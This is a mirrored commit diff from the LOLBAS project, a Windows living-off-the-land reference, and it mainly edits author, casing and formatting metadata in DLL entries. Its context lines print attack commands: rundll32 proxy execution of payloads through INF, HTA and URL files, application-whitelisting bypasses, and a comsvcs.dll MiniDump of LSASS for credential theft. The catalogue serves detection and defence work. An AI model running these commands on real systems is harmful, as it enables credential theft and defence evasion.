mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2025-07-25 19:53:08 +02:00
Merge remote-tracking branch 'upstream/master' into windows_11_sprint
This commit is contained in:
Wietze
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Advpack.dll
|
||||
Description: Utility for installing software and drivers with rundll32.exe
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
|
||||
@@ -62,4 +62,3 @@ Acknowledgement:
|
||||
Handle: '@moriarty_meng'
|
||||
- Person: Nick Carr (Threat Intel)
|
||||
Handle: '@ItsReallyNick'
|
||||
---
|
||||
|
||||
@@ -17,7 +17,7 @@ Commands:
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\desk.cpl
|
||||
- Path: C:\Windows\SysWOW64\desk.cpl
|
||||
@@ -41,4 +41,3 @@ Acknowledgement:
|
||||
Handle: '@SecurePeacock'
|
||||
- Person: Jose Luis Sanchez
|
||||
Handle: '@Joseliyo_Jstnk'
|
||||
---
|
||||
|
||||
@@ -7,7 +7,7 @@ Commands:
|
||||
- Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
|
||||
Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host)
|
||||
Usecase: Use binary to bypass Application whitelisting
|
||||
Category: AWL bypass
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
|
||||
@@ -17,13 +17,12 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
Resources:
|
||||
- Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||
- Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Ieadvpack.dll
|
||||
Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll.
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
|
||||
@@ -59,4 +59,3 @@ Acknowledgement:
|
||||
Handle: '@0rbz_'
|
||||
- Person: Pierre-Alexandre Braeken (RegisterOCX - CMD)
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
||||
@@ -1,12 +1,12 @@
|
||||
---
|
||||
Name: Ieframe.dll
|
||||
Description: Internet Browser DLL for translating HTML code.
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
|
||||
Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL.
|
||||
UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
|
||||
Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
@@ -28,4 +28,3 @@ Acknowledgement:
|
||||
Handle: '@bohops'
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Mshtml.dll
|
||||
Description: Microsoft HTML Viewer
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
|
||||
@@ -24,4 +24,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Pcwutl.dll
|
||||
Description: Microsoft HTML Viewer
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe
|
||||
@@ -25,4 +25,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt harr0ey
|
||||
Handle: '@harr0ey'
|
||||
---
|
||||
|
||||
@@ -1,19 +1,19 @@
|
||||
---
|
||||
Name: Setupapi.dll
|
||||
Description: Windows Setup Application Programming Interface
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf
|
||||
Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified).
|
||||
UseCase: Run local or remote script(let) code through INF file specification.
|
||||
Usecase: Run local or remote script(let) code through INF file specification.
|
||||
Category: AWL Bypass
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
- Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\calc_exe.inf
|
||||
Description: Launch an executable file via the InstallHinfSection function and .inf file section directive.
|
||||
UseCase: Load an executable payload.
|
||||
Usecase: Load an executable payload.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218.011
|
||||
@@ -43,4 +43,3 @@ Acknowledgement:
|
||||
Handle: '@subTee'
|
||||
- Person: Nick Carr (Threat Intel)
|
||||
Handle: '@ItsReallyNick'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Shdocvw.dll
|
||||
Description: Shell Doc Object and Control Library.
|
||||
Author: Jimmy (@bohops)
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
|
||||
@@ -19,13 +19,12 @@ Code_Sample:
|
||||
Detection:
|
||||
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||
Resources:
|
||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
- Link: https://twitter.com/bohops/status/997690405092290561
|
||||
- Link: https://windows10dll.nirsoft.net/shdocvw_dll.html
|
||||
- Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/
|
||||
- Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/
|
||||
- Link: https://twitter.com/bohops/status/997690405092290561
|
||||
- Link: https://windows10dll.nirsoft.net/shdocvw_dll.html
|
||||
Acknowledgement:
|
||||
- Person: Adam
|
||||
Handle: '@hexacorn'
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Shell32.dll
|
||||
Description: Windows Shell Common Dll
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe shell32.dll,Control_RunDLL c:\path\to\payload.dll
|
||||
@@ -48,4 +48,3 @@ Acknowledgement:
|
||||
Handle: '@mattifestation'
|
||||
- Person: Kyle Hanslovan (ShellExec_RunDLL)
|
||||
Handle: '@KyleHanslovan'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Syssetup.dll
|
||||
Description: Windows NT System Setup
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf
|
||||
@@ -40,4 +40,3 @@ Acknowledgement:
|
||||
Handle: '@harr0ey'
|
||||
- Person: Jimmy (Scriptlet)
|
||||
Handle: '@bohops'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Url.dll
|
||||
Description: Internet Shortcut Shell Extension DLL.
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
|
||||
@@ -69,4 +69,3 @@ Acknowledgement:
|
||||
Handle: '@DissectMalware'
|
||||
- Person: r0lan (Obfuscation)
|
||||
Handle: '@r0lan'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Zipfldr.dll
|
||||
Description: Compressed Folder library
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe
|
||||
@@ -34,4 +34,3 @@ Acknowledgement:
|
||||
Handle: '@moriarty_meng'
|
||||
- Person: r0lan (Obfuscation)
|
||||
Handle: '@r0lan'
|
||||
---
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
Name: Comsvcs.dll
|
||||
Description: COM+ Services
|
||||
Author:
|
||||
Author: LOLBAS Team
|
||||
Created: 2019-08-30
|
||||
Commands:
|
||||
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
|
||||
@@ -26,4 +26,3 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: modexp
|
||||
Handle:
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user